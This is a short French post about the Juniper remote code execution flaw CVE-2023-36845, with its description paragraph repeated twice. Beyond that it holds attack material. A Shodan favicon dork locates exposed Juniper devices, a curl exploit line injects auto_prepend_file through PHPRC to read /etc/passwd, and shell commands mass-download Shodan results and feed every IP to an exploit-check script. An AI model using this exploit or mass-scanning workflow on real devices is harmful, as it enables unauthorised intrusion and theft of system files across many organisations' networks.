
Juniper RCE (Exécution de code à distance) CVE-2023-36845 est une vulnérabilité identifiée dans le logiciel de Juniper. Ce défaut particulier permet l'exécution de code à distance, ce qui signifie qu'un attaquant pourrait exécuter du code arbitraire sur un système sans avoir besoin d'un accès physique à l'appareil.
Juniper RCE (Remote Code Execution) CVE-2023-36845 est une vulnérabilité identifiée dans le logiciel Juniper. Cette faille particulière permet l'exécution de code à distance, ce qui signifie qu'un attaquant pourrait exécuter du code arbitraire sur un système sans avoir besoin d'un accès physique à l'appareil.
Shodan dork: http.favicon.hash:2141724739
utilisez avec d'autres dorks pertinents tels que les certificats SSL, le nom de l'organisation, etc. pour une recherche plus ciblée.
curl -k https://$IP/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'
└─# shodan download Juniper 'http.favicon.hash:2141724739 ssl:domain.com’ #download from shodan
└─# shodan parse Juniper.json.gz --fields ip_str,port >unfiltered_IP_Ports.txt
└─# awk '{print $1":"$2}' unfiltered_IP_Ports.txt >juniper-final.txt
└─# ./Juniper-RCE-check.sh -f juniper-final.txt
